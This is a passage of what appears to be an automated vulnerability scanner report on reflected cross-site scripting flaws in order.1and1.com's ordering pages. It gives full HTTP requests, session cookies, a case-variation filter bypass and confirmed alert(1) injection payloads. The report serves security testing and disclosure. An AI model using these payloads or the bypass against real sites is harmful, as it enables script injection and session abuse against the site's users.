The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingPhotogallery is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingPhotogallery. The payload 99bea</ScRiPt%20>57d930332ed was submitted in the REST URL parameter 3. This input was returned as 99bea</ScRiPt >57d930332ed in a subsequent request for the URL /xml/order/FeatureSite-buildingPhotogallery.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/FeatureSite-buildingPhotogallery99bea</ScRiPt%20>57d930332ed;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:57:23 GMT; Path=/
ETag: 22783426aba0c8ad3815820a1b8c7156
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19319


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
ionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingPhotogallery";UNOUNO.params.lastpage="FeatureSite-buildingPhotogallery99bea</ScRiPt >57d930332ed";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.14. http://order.1and1.com/xml/order/FeatureSite-buildingWsb [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingWsb

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingWsb is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingWsb. The payload 8a254</ScRiPt%20>517ec0551f8 was submitted in the REST URL parameter 3. This input was returned as 8a254</ScRiPt >517ec0551f8 in a subsequent request for the URL /xml/order/FeatureSite-buildingWsb.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/FeatureSite-buildingWsb8a254</ScRiPt%20>517ec0551f8;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=IdGk5PD0zXFxcVmlfZixkXisdJ2BTZDxTRkAoLCkpKCYoJiMjJiUfIiYZGxowLVJAbGFjcSkrJlYvWWguISIeHSIeHDY0LjYtLDVtbjQpMGBpLyIjHx4jIB0gMjU2LzA=; Expires=Fri, 07-Apr-2079 21:56:27 GMT; Path=/
ETag: 64072c23e0b5d7c6b127c44390fcf074
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20609


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingWsb";UNOUNO.params.lastpage="FeatureSite-buildingWsb8a254</ScRiPt >517ec0551f8";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.15. http://order.1and1.com/xml/order/Gtc [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Gtc

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Gtc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Gtc. The payload c5e5c</ScRiPt%20>78e706dc8a4 was submitted in the REST URL parameter 3. This input was returned as c5e5c</ScRiPt >78e706dc8a4 in a subsequent request for the URL /xml/order/Gtc.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/Gtcc5e5c</ScRiPt%20>78e706dc8a4;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=cY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiMmISQlHh8=; Expires=Fri, 07-Apr-2079 21:51:20 GMT; Path=/
ETag: 293710f7dfa5ab5aebccd23aa4af1cf6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 119585


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
007652F99CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Gtc";UNOUNO.params.lastpage="Gtcc5e5c</ScRiPt >78e706dc8a4";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.16. http://order.1and1.com/xml/order/Home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Home is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Home. The payload 92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d was submitted in the REST URL parameter 3. This input was returned as 92d59</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89b6bbee8d in a subsequent request for the URL /xml/order/Home.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/Home92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Request 2

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:51:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTsuN2dwNikqJiUqJiQnJR8nHh0=; Expires=Fri, 07-Apr-2079 18:05:35 GMT; Path=/
ETag: 4aadadff388b28b120b90eb8b912244d
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36484


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
386BD5F5ED9C6322067094898.TCpfix140a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Home";UNOUNO.params.lastpage="Home92d59</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89b6bbee8d";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

2.17. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload f884f</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 was submitted in the REST URL parameter 3. This input was returned as f884f</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 in a subsequent request for the URL /xml/order/Hosting.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/Hostingf884f</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89d857b9fc1;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=5fd1c9683491b800; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDouNmZvNSgpJSQpJiMjJCYlICA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:17:AAABLtRfOq9lEKaygDOb8n3tYyw*hvMn:1300643134127; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/Hosting;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=5fd1c9683491b800; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDouNmZvNSgpJSQpJiMjJCYlICA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:17:AAABLtRfOq9lEKaygDOb8n3tYyw*hvMn:1300643134127; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:46:54 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTsvN2dwNikqJiUqJyQkJScmISE=; Expires=Fri, 07-Apr-2079 21:01:01 GMT; Path=/
ETag: cda9465f5926bed8b0023a0e52b6c03c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59779


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
115F77E4A430487B74D.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Hosting";UNOUNO.params.lastpage="Hostingf884f</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89d857b9fc1";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

2.18. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload af2f1</ScRiPt%20>54b667825a6 was submitted in the REST URL parameter 3. This input was returned as af2f1</ScRiPt >54b667825a6 in a subsequent request for the URL /xml/order/Hosting.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/Hostingaf2f1</ScRiPt%20>54b667825a6;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=5fd1c9683491b800; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDouNmZvNSgpJSQpJiMjJCYlICA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:17:AAABLtRfOq9lEKaygDOb8n3tYyw*hvMn:1300643134127; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/Hosting;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=5fd1c9683491b800; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDouNmZvNSgpJSQpJiMjJCYlICA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:17:AAABLtRfOq9lEKaygDOb8n3tYyw*hvMn:1300643134127; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:26:24 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8jK1tkKh0eGjA1Mi8vMDIxLCw=; Expires=Fri, 07-Apr-2079 21:40:31 GMT; Path=/
ETag: 6bf983c9a22ff4b8293bdd71650f2e78
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 60334


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
